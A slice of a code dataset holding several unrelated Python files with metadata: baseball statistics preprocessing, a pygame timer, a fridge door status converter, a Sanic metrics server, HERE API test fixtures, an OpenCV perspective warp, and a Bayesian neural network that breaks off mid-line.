sal_2016['MONEY'].str.slice(0,-2).astype(int)\n pcode_2016 = sal_2016[['PCODE','T_ID']]\n result_2016 = pd.concat([pcode_2016,absal_2016], axis=1)\n\n absal_2017 = sal_2017['MONEY'].str.slice(0,-2).astype(int)\n pcode_2017 = sal_2017[['PCODE','T_ID']]\n result_2017 = pd.concat([pcode_2017,absal_2017], axis=1)\n\n absal_2018 = sal_2018['MONEY'].str.slice(0,-2).astype(int)\n pcode_2018 = sal_2018[['PCODE','T_ID']]\n result_2018 = pd.concat([pcode_2018,absal_2018], axis=1)\n\n absal_2019 = sal_2019['MONEY'].str.slice(0,-2).astype(int)\n pcode_2019 = sal_2019[['PCODE','T_ID']]\n result_2019 = pd.concat([pcode_2019,absal_2019], axis=1)\n\n absal_2020 = sal_2020['MONEY'].str.slice(0,-2).astype(int)\n pcode_2020 = sal_2020[['PCODE','T_ID']]\n result_2020 = pd.concat([pcode_2020,absal_2020], axis=1)\n\n data_17 = pd.merge(result_2016,result_2017, on ='PCODE', suffixes =('_2016','_2017')).dropna()\n data_17['fluctuation'] = data_17['MONEY_2017']/data_17['MONEY_2016']\n data_18 = pd.merge(result_2017,result_2018, on ='PCODE', suffixes =('_2017','_2018')).dropna()\n data_18['fluctuation'] = data_18['MONEY_2018']/data_18['MONEY_2017']\n data_19 = pd.merge(result_2018,result_2019, on ='PCODE', suffixes =('_2018','_2019')).dropna()\n data_19['fluctuation'] = data_19['MONEY_2019']/data_19['MONEY_2018']\n data_20 = pd.merge(result_2019,result_2020, on ='PCODE', suffixes =('_2019','_2020')).dropna()\n data_20['fluctuation'] = data_20['MONEY_2020']/data_20['MONEY_2019']\n\n df17 = pd.DataFrame(data_17.groupby('T_ID_2017')['fluctuation'].mean()).reset_index()\n df18 = pd.DataFrame(data_18.groupby('T_ID_2018')['fluctuation'].mean()).reset_index()\n df19 = pd.DataFrame(data_19.groupby('T_ID_2019')['fluctuation'].mean()).reset_index()\n df20 = pd.DataFrame(data_20.groupby('T_ID_2020')['fluctuation'].mean()).reset_index()\n\n jsn2017 = dict()\n jsn2018 = dict()\n jsn2019 = dict()\n jsn2020 = dict()\n\n for i in np.array(df17):\n jsn2017[i[0]] = i[1]\n\n for i in np.array(df18):\n jsn2018[i[0]] = i[1]\n\n for i in np.array(df19):\n jsn2019[i[0]] = i[1]\n\n for i in np.array(df20):\n jsn2020[i[0]] = i[1]\n return jsn2017, jsn2018, jsn2019, jsn2020\n\ndef kmeans():\n players = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_선수_2020.csv', encoding='cp949').dropna()\n indiv_hit_18 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_개인타자_2018.csv', encoding='cp949')\n indiv_hit_19 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_개인타자_2019.csv', encoding='cp949')\n indiv_hit_20 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_개인타자_2020.csv', encoding='cp949')\n frame = [indiv_hit_18, indiv_hit_19, indiv_hit_20]\n batter_ind_all = pd.concat(frame).reset_index().drop('index', axis=1)\n players = players[['PCODE', 'NAME']]\n players.rename(columns={'PCODE': 'P_ID'}, inplace=True)\n players.drop_duplicates(subset=\"P_ID\", inplace=True)\n batter_ind_all = batter_ind_all[['P_ID','START_CK', 'BAT_ORDER_NO', 'PA', 'AB', 'RBI', 'RUN', 'HIT', 'H2', 'H3','HR', 'SB', 'CS', 'SH', 'SF', 'BB', 'IB', 'HP', 'KK', 'GD', 'ERR',\n 'LOB', 'P_HRA_RT', 'P_AB_CN', 'P_HIT_CN']]\n df = pd.DataFrame(batter_ind_all.groupby('P_ID')[['PA', 'START_CK', 'AB', 'RBI', 'RUN', 'HIT', 'H2', 'H3',\n 'HR', 'SB', 'CS', 'SH', 'SF', 'BB', 'IB', 'HP', 'KK', 'GD',\n 'ERR']].apply(sum))\n df = df[df['PA'] >= 900]\n df = df.apply(lambda x: create_saber_stats_for_Kmeans(x), axis=1)\n df['BB'] = df.apply(lambda x: x.BB + x.IB + x.HP, axis=1)\n df = df.drop(['IB', 'HP'], axis=1)\n df['START_PA'] = df.apply(lambda x: x.START_CK / x.PA, axis=1) # 스타팅으로 
출전하는 빈도\n df['SB_attempt'] = df.apply(lambda x: (x.SB + x.CS) / (x.HIT - x.H2 - x.H3 - x.HR + x.BB), axis=1) # 1루 진출 시 도루 시도\n df.loc[:, 'RBI':'ERR'] = df.loc[:, 'RBI':'ERR'].div(df.PA, axis=0)\n\n df_kmeans = df[['AVG', 'ISO', 'HR_HIT', 'PA_BB', 'SB_attempt']]\n X = df_kmeans.values\n\n scaler = StandardScaler()\n X_std = scaler.fit_transform(X)\n kmeans = KMeans(n_clusters=5, max_iter=30, random_state=0)\n pred = kmeans.fit_predict(X_std)\n df['type'] = pred\n df.reset_index(inplace=True)\n df_new = pd.merge(df, players, how='inner', on='P_ID')\n return df_new\n\ndef create_saber_stats_for_Kmeans(row):\n row['AVG'] = row.HIT / row.AB # 타율\n\n row['OPS'] = ((row.HIT + row.BB + row.HP) + ((row.HIT - row.H2 - row.H3 - row.HR)\n + (row.H2 * 2) + (row.H3 * 3) + (row.HR * 4))) / row.AB\n\n row['wOBA'] = ((0.69 * (row.BB - row.IB)) + (0.72 * row.HP) + (0.89 * (row.HIT - row.H2 - row.H3 - row.HR))\n + (1.27 * row.H2) + (1.62 * row.H3) + (2.1 * row.HR)) / (row.AB + row.BB - row.IB + row.SF + row.HP)\n\n row['ISO'] = (row.H2 + (2 * row.H3) + (3 * row.HR)) / row.AB # 타자의 파워\n\n row['PA_BB'] = row.PA / (row.BB + row.IB + row.HP) # 단위 볼넷 당 타석 수\n\n row['HR_HIT'] = row.HR / row.HIT # 단위 안타 당 홈런 개수\n return row\n\n\ndef foriegn_players():\n pitcher16 = pd.read_csv('./data_csv/pitcher/pitcher2016.csv', encoding='cp949')\n pitcher17 = pd.read_csv('./data_csv/pitcher/pitcher2017.csv', encoding='cp949')\n pitcher18 = pd.read_csv('./data_csv/pitcher/pitcher2018.csv', encoding='cp949')\n pitcher19 = pd.read_csv('./data_csv/pitcher/pitcher2019.csv', encoding='cp949')\n hitter16 = pd.read_csv('./data_csv/hitter/hitter2016.csv', encoding='cp949')\n hitter17 = pd.read_csv('./data_csv/hitter/hitter2017.csv', encoding='cp949')\n hitter18 = pd.read_csv('./data_csv/hitter/hitter2018.csv', encoding='cp949')\n hitter19 = pd.read_csv('./data_csv/hitter/hitter2019.csv', encoding='cp949')\n pitcher20 = pd.read_csv('./data_csv/2020_ind_pit.csv')\n hitter20 = pd.read_csv('./data_csv/2020_ind_hit.csv')\n pitcher20 = pitcher20[pitcher20['P_ID'] != 'No_Code']\n hitter20 = hitter20[hitter20['P_ID'] != 'No_Code']\n pitcher20['P_ID'] = pitcher20['P_ID'].astype('int')\n hitter20['P_ID'] = hitter20['P_ID'].astype('int')\n\n # 외국인 명단\n pit16 = {'WO': [65331, 62322, 66323, 66324], 'OB': [61240, 66226], 'LT': [65543, 65546],\n 'SS': [66402, 66423, 66440, 66446], 'HH': [66748, 66750, 65742, 66742], \\\n 'HT': [66643, 66628], 'KT': [67845, 66032, 65331, 66049, 66050], 'LG': [66154, 66138, 62698],\n 'NC': [65931, 63938], 'SK': [63810, 66825, 65856]}\n hit16 = {'WO': [66306], 'OB': [66244], 'LT': [65523, 66523], 'SS': [66452], 'HH': [66740], 'HT': [64699],\n 'KT': [65005], \\\n 'LG': [65103], 'NC': [64914], 'SK': [66805]}\n\n pit17 = {'WO': [67312, 67313, 62322], 'OB': [61240, 66226], 'LT': [67559, 65546, 65543], 'SS': [67423, 67435],\n 'HH': [67748, 67742], \\\n 'HT': [67645, 66643], 'KT': [67033, 65331], 'LG': [66138, 62698], 'NC': [67948, 63938],\n 'SK': [65856, 67815]}\n hit17 = {'WO': [66306, 67394], 'OB': [66244], 'LT': [67598], 'SS': [67450], 'HH': [66740], 'HT': [67650],\n 'KT': [67024, 67025], \\\n 'LG': [65103, 67134], 'NC': [67935], 'SK': [67827, 67872]}\n\n pit18 = {'WO': [65742, 63938, 67313], 'OB': [65543, 68240], 'LT': [65546, 68526], 'SS': [68435, 68400],\n 'HH': [68748, 68742, 68794], \\\n 'HT': [67645, 66643], 'KT': [65331, 61240], 'LG': [62698, 68135], 'NC': [68953, 68948],\n 'SK': [65856, 68815]}\n hit18 = {'WO': [67394, 68345], 'OB': [68244, 68245], 'LT': [67598], 'SS': [67450], 'HH': [68730], 'HT': [67650],\n 'KT': 
[67025], \\\n 'LG': [68103], 'NC': [67935], 'SK': [67872]}\n\n pit19 = {'WO': [67313, 69343], 'OB': [65543, 68240], 'LT': [65546, 69550], 'SS': [69435, 69439, 69413],\n 'HH': [69744, 69748], \\\n 'HT': [69640, 69656], 'KT': [69045, 69032], 'LG': [69103, 68135], 'NC': [69940, 69934, 69953],\n 'SK': [69861, 62698, 68815]}\n hit19 = {'WO': [68345], 'OB': [69209], 'LT': [69530, 69569], 'SS': [67450], 'HH': [68730], 'HT': [69605, 69652],\n 'KT': [67025], \\\n 'LG': [69150, 69165], 'NC': [69950, 69901], 'SK': [67872]}\n\n pit20 = {'WO': [67313, 69343], 'OB': [50234, 69045], 'LT': [50558, 50524], 'SS': [69439, 50404],\n 'HH': [69744, 69748], \\\n 'HT': [50636, 50640], 'KT': [69032, 50040], 'LG': [69103, 68135], 'NC': [69940, 50912],\n 'SK': [50815, 50835]}\n hit20 = {'WO': [50300, 99998], 'OB': [69209], 'LT': [50506], 'SS': [50468, 99999], 'HH': [68730, 50730],\n 'HT': [69652], 'KT': [67025], \\\n 'LG': [50165], 'NC': [50923], 'SK': [67872, 99997]}\n\n # 16년도 외국인 용병 수치 구하기 (투수)- 17, 18, 19, 20년도 숫자만 바꿔주면 가능\n dt = [['G_ID', 'GDAY_DS', 'T_ID', 'VS_T_ID', 'FR_INN2', 'FR_ER']]\n for j in ['NC', 'LG', 'WO', 'HH', 'HT', 'SK', 'KT', 'OB', 'LT', 'SS']:\n for i in list(pitcher16[pitcher16['T_ID'] == j].G_ID.unique()):\n if len(pitcher16[(pitcher16.G_ID == i) & pitcher16.P_ID.isin(pit16[j])]):\n ER = pitcher16[(pitcher16.G_ID == i) & pitcher16.P_ID.isin(pit16[j])].ER.sum()\n INN = pitcher16[(pitcher16.G_ID == i) & pitcher16.P_ID.isin(pit16[j])].INN2.sum()\n else:\n ER = 0\n INN = 0\n dt.append(\n [pitcher16[(pitcher16.G_ID == i)].G_ID.values[0], pitcher16[(pitcher16.G_ID == i)].GDAY_DS.values[0], \\\n j, pitcher16[(pitcher16.G_ID == i) & (pitcher16.T_ID == j)].VS_T_ID.values[0], INN, ER])\n dt_16 = pd.DataFrame(dt[1:], columns=dt[0])\n dt_16.sort_values(by=['T_ID', 'GDAY_DS']).to_csv('./data/result/fr_pit_2016.csv', index=False)\n\n # 16년도 외국인 용병 수치 구하기 (타자) - 17, 18, 19, 20년도 숫자만 바꿔주면 가능\n df = [['G_ID', 'GDAY_DS', 'T_ID', 'VS_T_ID', 'FR_AB', 'FR_HIT', 'FR_H2', 'FR_H3', 'FR_HR']]\n\n for j in ['NC', 'LG', 'WO', 'HH', 'HT', 'SK', 'KT', 'OB', 'LT', 'SS']:\n for i in list(hitter16[hitter16['T_ID'] == j].G_ID.unique()):\n if len(hitter16[(hitter16.G_ID == i) & hitter16.P_ID.isin(hit16[j])]):\n AB = hitter16[(hitter16.G_ID == i) & hitter16.P_ID.isin(hit16[j])].AB.sum()\n HIT = hitter16[(hitter16.G_ID == i) & hitter16.P_ID.isin(hit16[j])].HIT.sum()\n H2 = hitter16[(hitter16.G_ID == i) & hitter16.P_ID.isin(hit16[j])].H2.sum()\n H3 = hitter16[(hitter16.G_ID == i) & hitter16.P_ID.isin(hit16[j])].H3.sum()\n HR = hitter16[(hitter16.G_ID == i) & hitter16.P_ID.isin(hit16[j])].HR.sum()\n else:\n AB = 0\n HIT = 0\n H2 = 0\n H3 = 0\n HR = 0\n df.append([hitter16[(hitter16.G_ID == i)].G_ID.values[0], hitter16[(hitter16.G_ID == i)].GDAY_DS.values[0], \\\n j, hitter16[(hitter16.G_ID == i) & (hitter16.T_ID == j)].VS_T_ID.values[0], AB, \\\n HIT, H2, H3, HR])\n df_16 = pd.DataFrame(df[1:], columns=df[0])\n df_16.sort_values(by=['T_ID', 'GDAY_DS']).to_csv('fr_hit_2016.csv', index=False)\n\n\n\ndef train_test_split(team_data, team_three):\n team_merge = pd.merge(team_data, team_three, on=['G_ID', 'GDAY_DS', 'T_ID', 'VS_T_ID'], how='left')\n team_merge = team_merge.sort_values(by=['T_ID', 'G_ID'])\n team_train = pd.DataFrame(columns=team_merge.columns)\n team_test = pd.DataFrame(columns=team_merge.columns)\n for i in ['NC', 'KT', 'WO', 'LT', 'SK', 'SS', 'HT', 'HH', 'OB', 'LG']:\n team_train = pd.concat([team_train, team_merge[team_merge['T_ID'] == i].iloc[:-26].sort_values(by='G_ID')])\n team_test = pd.concat([team_test, 
team_merge[team_merge['T_ID'] == i].iloc[-1:-27:-1].sort_values(by='G_ID')])\n return team_train, team_test\n\n\n\ndef main():\n indiv_pit_all, indiv_hit_all, team_hit_all, team_pit_all = rawdata_preprocess()\n\n team_all = add_and_concat(indiv_pit_all, team_pit_all, team_hit_all)\n team_saber_all = saber_stats(team_all)\n\n # add_rel = rel_w_rate(team_saber_all) # 상대전적 구하는 함수인데 성능에 안 좋은 영향을 주어 안 썼습니다.\n # div_kmeans = kmeans() # 선수들의 유형을 군집화하는 함수인데 성능이 약간 낮아져 안썼습니다.\n # foriegn_players() # 외국인 선수들의 각 경기별 지표인데, 좋은 활용방안을 못 찾아 최종으로 쓰지 않았습니다.\n # sal17, sal18, sal19, sal20 = money() # 팀마다의 연봉 상승률을 고려하여 제작했지만, 성능에 궁정적 영향을 주지않아 사용하지 않았습니다.\n\n\n team_3hal = count_of_avg_3(indiv_hit_all)\n train_data, test_data = train_test_split(team_saber_all, team_3hal)\n train_data.to_csv('./data/result/train_data.csv', index=False)\n test_data.to_csv('./data/result/test_data.csv', index=False)\n\nif __name__ == '__main__':\n main()","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":25735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"539919786","text":"import pygame\nimport time;\nimport math;\nfrom Color import Color\n#########################################################\n# Orlige gere le temps et son affichage #\n#Entre; Temps d'affichage #\n#Sortie: Null #\n#########################################################\n\nclass Orloge:\n\n def __init__(self,T,pos,pos_lenght):\n\n self.timeLeft=T\n self.totalTime=T\n self.currentTime=time.time()\n self.rect = pygame.Rect(pos[0], pos[1], pos_lenght, 30)\n self.color = pygame.Color(Color[\"color11\"][0], Color[\"color11\"][1], Color[\"color11\"][2])\n self.rect_back = pygame.Rect(pos[0], pos[1], pos_lenght, 30)\n self.color_back = pygame.Color(Color[\"dark blue\"][0], Color[\"dark blue\"][1], Color[\"dark blue\"][2])\n\n self.lenght = pos_lenght\n\n self.pos=pos\n self.dt=0\n\n\n\n def update(self, fenetre, ratings):\n self.dt=time.time()-self.currentTime\n self.timeLeft=self.totalTime-self.dt\n if self.timeLeft<0:\n self.timeLeft=0\n self.display(fenetre, ratings)\n\n\n def display(self, fenetre, ratings):\n p= self.timeLeft/self.totalTime\n\n if p*100 == ratings.very_good:\n self.color = pygame.Color(Color[\"color8\"][0], Color[\"color8\"][1], Color[\"color8\"][2])\n if p*100 == ratings.good:\n self.color = pygame.Color(Color[\"orange\"][0], Color[\"orange\"][1], Color[\"orange\"][2])\n if p*100 == ratings.not_good:\n self.color = pygame.Color(Color[\"dark orange\"][0], Color[\"dark orange\"][1], Color[\"dark orange\"][2])\n if p*100 == ratings.bad:\n self.color = pygame.Color(Color[\"dark pink\"][0], Color[\"dark pink\"][1], Color[\"dark pink\"][2])\n\n self.rect_back[2] = self.lenght * (1-p)\n pygame.draw.rect(fenetre, self.color, self.rect, 0)\n pygame.draw.rect(fenetre, self.color, self.rect, 5)\n if self.rect_back[2] > 0:\n pygame.draw.rect(fenetre, self.color_back, self.rect_back, 0)\n font = pygame.font.Font(\"data/freesansbold.ttf\",17)\n\n # display the time left\n hour = int(self.timeLeft / 3600);\n min = int(self.timeLeft / 60 - (hour * 3600));\n sec = int(self.timeLeft - (min * 60) - (hour * 3600))\n\n text = font.render('Time left: ',1,(Color[\"yellow\"][0], Color[\"yellow\"][1], Color[\"yellow\"][2]))\n fenetre.blit(text,(self.pos[0]-280,self.pos[1]+ 5))\n\n text = font.render(str(hour) + ':' + str(min) + ':' + str(sec),1,(Color[\"white\"][0], Color[\"white\"][1], Color[\"white\"][2]))\n fenetre.blit(text,(self.pos[0]-85,self.pos[1]+ 
5))\n","sub_path":"src/Orloge.py","file_name":"Orloge.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"434651565","text":"from ..abstract import ErdReadOnlyConverter\nfrom ..primitives import *\nfrom gehomesdk.erd.values.fridge import FridgeDoorStatus, ErdDoorStatus\n\nclass FridgeDoorStatusConverter(ErdReadOnlyConverter[FridgeDoorStatus]):\n def erd_decode(self, value: str) -> FridgeDoorStatus:\n def get_door_status(val: str) -> ErdDoorStatus:\n try:\n return ErdDoorStatus(val)\n except ValueError:\n return ErdDoorStatus.NA\n\n fridge_right = get_door_status(value[:2])\n fridge_left = get_door_status(value[2:4])\n freezer = get_door_status(value[4:6])\n drawer = get_door_status(value[6:8])\n if (fridge_right != ErdDoorStatus.OPEN) and (fridge_left != ErdDoorStatus.OPEN):\n if freezer == ErdDoorStatus.OPEN:\n status = \"Freezer Open\"\n else:\n status = \"Closed\"\n elif freezer == ErdDoorStatus.OPEN:\n status = \"All Open\"\n else:\n status = \"Fridge Open\"\n return FridgeDoorStatus(\n fridge_right=fridge_right,\n fridge_left=fridge_left,\n freezer=freezer,\n drawer=drawer,\n status=status,\n )\n","sub_path":"gehomesdk/erd/converters/fridge/fridge_door_status_converter.py","file_name":"fridge_door_status_converter.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"274307506","text":"import asyncio\nfrom sanic import Sanic\nfrom sanic.response import json, text\nimport os\nimport sqlite3\nimport numpy as np\nimport pandas as pd\nimport math\nfrom utils import u, b\nimport redis\n\nimport logging\nlogging.basicConfig(level=logging.DEBUG)\n\nrds = redis.StrictRedis()\n\nDATA_DIR = b'./data'\nDB_DIR = b'./db'\n\nfile_handles = {}\n\nINDEX_DB = b'/'.join([DB_DIR, b'index.db'])\n\ndb_conn = sqlite3.connect(INDEX_DB.decode())\n\ndef prepare_db():\n c = db_conn.cursor()\n try:\n c.execute('''CREATE TABLE metrics(name text, last_ts int, last_val real)''')\n c.execute('''CREATE TABLE metric_props(metric_name text, name text, value text)''')\n c.execute('''CREATE TABLE metrics_files(metric_name text, min_ts int, max_ts int, file_path text)''')\n except:\n # TODO: check metrics already exists\n pass\n db_conn.commit()\n\nprepare_db()\n\napp = Sanic()\n\ndef update_db_index(metric_name, ts, val, file_path):\n c = db_conn.cursor()\n c.execute(\"select name from metrics where name=?\", (metric_name,) )\n row = c.fetchone()\n if not row:\n c.execute('''\n insert into metrics(name, last_ts, last_val)\n values (?, ?, ?)\n ''', (metric_name, ts, val))\n else:\n # update maybe\n pass\n\n c.execute('select metric_name from metrics_files where metric_name=? 
and file_path=?', (metric_name, file_path))\n row = c.fetchone()\n if not row:\n c.execute('''\n insert into metrics_files(metric_name, file_path)\n values (?, ?)\n ''', (metric_name, file_path))\n\n db_conn.commit()\n\n@app.route(\"/\")\nasync def main(request):\n return text(\"ok\")\n\ndef prepare_dirs(metric_name, customer=b'customer_1'):\n dir = b'/'.join([DATA_DIR, customer, b(metric_name).replace(b'.', b'/')])\n if not os.path.exists(dir):\n os.makedirs(dir, exist_ok=True)\n return dir\n\ndef get_fhandle(fname):\n if file_handles.get(fname):\n return file_handles.get(fname)\n file_handles[fname] = open(fname, 'a+')\n print(\"new file handle -\", fname)\n return file_handles[fname]\n\ncnt = 0\n\ndef save_record(metric_name, ts, val):\n global cnt\n dir = prepare_dirs(metric_name)\n hour_ts = math.floor(ts/3600)*3600\n fname = os.path.join(u(dir), u(hour_ts))\n fname = '{}.csv'.format(u(fname))\n fhandle = get_fhandle(fname)\n fhandle.write(','.join(u([ts, val])))\n fhandle.write('\\n')\n\n rds.lpush('metrics_queue', ','.join(u([metric_name, ts, val])))\n\n #\n # update_db_index(metric_name, ts, val, fname)\n\ndef process_line(ln):\n if not ln:\n return\n vals = [v.strip() for v in ln.split(b',')]\n if len(vals) < 3:\n return\n metric_name, ts, val = vals[0:3]\n # print(metric_name, ts, val)\n save_record(metric_name, float(ts), val)\n\n@app.route(\"/metrics\", methods=['POST'])\nasync def metrics(request):\n try:\n lines = request.body.split(b'\\n')\n for ln in lines:\n process_line(ln)\n except:\n raise\n # return text('-err')\n return text(\"+ok\")\n\n\n@app.route('/collectd-post', methods=['POST'])\nasync def collectd_post(request):\n import json as jsn\n data = jsn.loads(request.body)\n for ln in data:\n ts = ln['time']\n\n m = []\n for k in ('host', 'plugin', 'plugin_instance', 'plugin_type', 'type_instance'):\n tv = ln.get(k, '')\n if tv:\n m.append(tv)\n\n for t in zip(ln['dstypes'], ln['dsnames'], ln['values']):\n metric_name = '.'.join(m + list(t[0:2]))\n v = t[-1]\n if 'cpu.' 
in metric_name:\n print(ln)\n save_record(metric_name.encode(), ts, v)\n\n return text(\"+ok\\r\\n\")\n\n# these are for mimicking prometheus api\n@app.route('/api/v1/label//values')\nasync def api_name(request, name):\n\n if name == '__name__':\n c = db_conn.cursor()\n c.execute('''\n select name from metrics order by name\n ''')\n\n names = [row[0] for row in c.fetchall()]\n return json({\n \"status\" : \"success\",\n \"data\" : names\n })\n\n return text('-err:Unsupported')\n\ndef int_or_none(i):\n if i is None:\n return i\n return int(i)\n\nfrom sanic.exceptions import SanicException\n\nclass NotAuthenticated(SanicException):\n status_code = 401\n\nclass NotAllowed(SanicException):\n status_code = 403\n\nimport base64\n\ndef auth(request, authenticator):\n auths = request.headers.get('authorization', '')\n if not auths:\n raise NotAuthenticated('not authenticated')\n\n t = auths.split('Basic ')[1]\n decoded = base64.b64decode(t)\n user, passwd = decoded.split(b':')\n authenticated = authenticator(user, passwd)\n if not authenticated:\n raise NotAllowed('credentials wrong, or not allowed')\n\n return user, passwd\n\n@app.route('/api/v1/query_range')\nasync def query_range(request):\n from cli import load_files\n auth(request, authenticator=lambda u, p: True)\n\n start = int(request.args.get('start', 0))\n end = int_or_none(request.args.get('end', None))\n metric_name = request.args['query'][0].encode()\n ds = load_files(metric_name, ts_start=start, ts_end=end)\n\n # print(request.args)\n if ds is None:\n vals = []\n else:\n # resample now.\n step = request.args.get('step', None)\n if step:\n ds = ds.resample('{}s'.format(step)).mean()\n\n # convert to epoch\n ds.index = ds.index.astype(np.int64) // 10 ** 9\n\n vals = []\n for i, v in ds.itertuples():\n vals.append((float(i), float(v)))\n\n return json({\n \"status\" : \"success\",\n \"data\" : {\n \"resultType\" : \"matrix\",\n \"result\" : [\n {\n \"metric\" : {\n \"__name__\" : metric_name,\n },\n \"values\" : vals\n }\n ]\n }\n })\n\n@asyncio.coroutine\ndef periodic(app, loop):\n while True:\n for k, f in file_handles.items():\n f.flush()\n yield from asyncio.sleep(3)\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=8001, debug=False, after_start=periodic)\n\n\n\"\"\"\ncurl -v -X POST --data-binary @post_values.txt http://localhost:8001/metrics/\n\"\"\"","sub_path":"old_app.py","file_name":"old_app.py","file_ext":"py","file_size_in_byte":6276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"365026154","text":"\"\"\"Fixtures for HERE Travel Time tests.\"\"\"\nimport json\nfrom unittest.mock import patch\n\nfrom herepy.models import RoutingResponse\nimport pytest\n\nfrom tests.common import load_fixture\n\nRESPONSE = RoutingResponse.new_from_jsondict(\n json.loads(load_fixture(\"here_travel_time/car_response.json\"))\n)\nRESPONSE.route_short = \"US-29 - K St NW; US-29 - Whitehurst Fwy; I-495 N - Capital Beltway; MD-187 S - Old Georgetown Rd\"\n\nEMPTY_ATTRIBUTION_RESPONSE = RoutingResponse.new_from_jsondict(\n json.loads(load_fixture(\"here_travel_time/empty_attribution_response.json\"))\n)\nEMPTY_ATTRIBUTION_RESPONSE.route_short = \"US-29 - K St NW; US-29 - Whitehurst Fwy; I-495 N - Capital Beltway; MD-187 S - Old Georgetown Rd\"\n\n\n@pytest.fixture(name=\"valid_response\")\ndef valid_response_fixture():\n \"\"\"Return valid api response.\"\"\"\n with patch(\n \"herepy.RoutingApi.public_transport_timetable\",\n return_value=RESPONSE,\n ) as mock:\n yield 
mock\n\n\n@pytest.fixture(name=\"empty_attribution_response\")\ndef empty_attribution_response_fixture():\n \"\"\"Return valid api response with an empty attribution.\"\"\"\n with patch(\n \"herepy.RoutingApi.public_transport_timetable\",\n return_value=EMPTY_ATTRIBUTION_RESPONSE,\n ) as mock:\n yield mock\n","sub_path":"tests/components/here_travel_time/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"545265449","text":"import cv2\nimport numpy as np\n\nimg = cv2.imread(\"resource/cards.jpg\")\n\nwidth, height = 250, 350\t#output size\npts1 = np.float32([[457,100], [600,160], [352,280], [525,370]]) #point of object edge\npts2 = np.float32([[0,0], [width,0], [0, height], [width,height]]) #new point object\nmatrix = cv2.getPerspectiveTransform(pts1, pts2)\nimgOutput = cv2.warpPerspective(img, matrix, (width, height))\n\ncv2.imshow(\"Image\", img)\ncv2.imshow(\"Output\", imgOutput)\ncv2.waitKey(0)","sub_path":"5-wrap-prespective.py","file_name":"5-wrap-prespective.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"362409719","text":"import pdb\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nfrom torch import nn, optim\nimport torch.nn.functional as F\n\n# NN utility function\n\ndef get_layer_sizes_from_arch(arch):\n \"\"\"get layer_sizes from architechture layer sizes description\"\"\"\n \n layer_sizes = [[m,n] for m,n in zip(arch[:-1], arch[1:])]\n \n return layer_sizes \n\ndef get_num_weights_from_arch(arch):\n\n layer_sizes = get_layer_sizes_from_arch(arch)\n\n num_weights = sum((m+1)*n for m,n in layer_sizes)\n\n return num_weights\n\n\n# simple bnn to sample from, includes the fact that each want to have sample outputs & weights\n\nclass BNN():\n\n def __init__(self, arch, mean, log_std):\n self.layer_sizes = get_layer_sizes_from_arch(arch)\n \n self.params = (mean, log_std)\n\n def sample_weights(self, N_samples):\n mean, log_std = self.params\n \n epsilons = torch.randn(N_samples, mean.shape[0]) \n log_std_expanded = log_std.expand(N_samples, *log_std.shape)\n mean_expanded = mean.expand(N_samples, *mean.shape)\n\n return epsilons*log_std_expanded.exp() + mean_expanded\n\n def unpack_layers(self, weights):\n n_samples = len(weights)\n\n for m,n in self.layer_sizes:\n yield weights[:, :m*n].reshape((n_samples, m, n)), \\\n weights[:, m*n : m*n + n].reshape(n_samples, 1, n)\n\n weights = weights[:, (m+1) * n:]\n\n def reshape_weights(self, weights):\n layer_weights = list(self.unpack_layers(weights))\n\n return layer_weights\n\n def bnn_predict(self, weights, inputs, act):\n\n #inputs = inputs[None, :, :] # [1, N, D]\n weights = self.reshape_weights(weights)\n\n for W,b in weights:\n #outputs = torch.Tensor(np.einsum('mnd,mdo->mno', inputs, W)) + b\n \n if len(inputs.shape) == 2:\n num_weight_samples = W.shape[0]\n inputs = inputs.expand(num_weight_samples, *inputs.shape)\n\n #pdb.set_trace()\n \n outputs = inputs.bmm(W) + b\n inputs = act(outputs)\n\n return outputs \n\n\n def sample_bnn(self, x, N_samples, act = F.tanh):\n bnn_weights = self.sample_weights(N_samples)\n\n f_bnn = self.bnn_predict(bnn_weights, x, act)[:, :, 0]\n\n return f_bnn, bnn_weights\n\n\n\n# bnn_wrapper with mean & std parameters to optimize\n\nclass BNN_wrapper(nn.Module):\n\n def __init__(self, arch):\n super(BNN_wrapper, self).__init__()\n\n # initialize 
posterior parameters\n self.num_weight_samples = get_num_weights_from_arch(arch)\n self.mean = nn.Parameter(torch.randn(self.num_weight_samples))\n #self.log_std = nn.Parameter(torch.zeros(self.num_weight_samples))\n self.log_std = nn.Parameter(torch.ones(self.num_weight_samples) * -5)\n\n def forward(self, inputs, N_samples, act=F.relu):\n bnn_func = BNN(arch, self.mean, self.log_std)\n\n outputs, sampled_weights = bnn_func.sample_bnn(inputs, N_samples, act)\n\n return outputs, sampled_weights\n\n\n# simple vlb_objective like in Daniel's file\n\ndef gaussian_entropy(log_std):\n return 0.5 * log_std.shape[0] * (1.0 + np.log(2*np.pi)) + log_std.sum()\n\ndef diag_gausian_log_density(x, mu, log_std):\n n = x.shape[0]\n\n #batch_size = mu.shape[0]\n #x_expanded = x.expand(batch_size, *x.shape)\n \n std = np.exp(log_std)\n\n #pdb.set_trace()\n\n return -0.5*n*(np.log(2*np.pi) + log_std) - ((x - mu)**2/(2* (std**2))).sum(dim=1)\n\ndef vlb_objective(params, y, mu_y, sample_weights):\n mean, log_std = params\n \n entropy = gaussian_entropy(log_std)\n\n log_likelihood = diag_gausian_log_density(y.t(), mu_y, 0.1)\n log_prior = diag_gausian_log_density(sample_weights, 0, 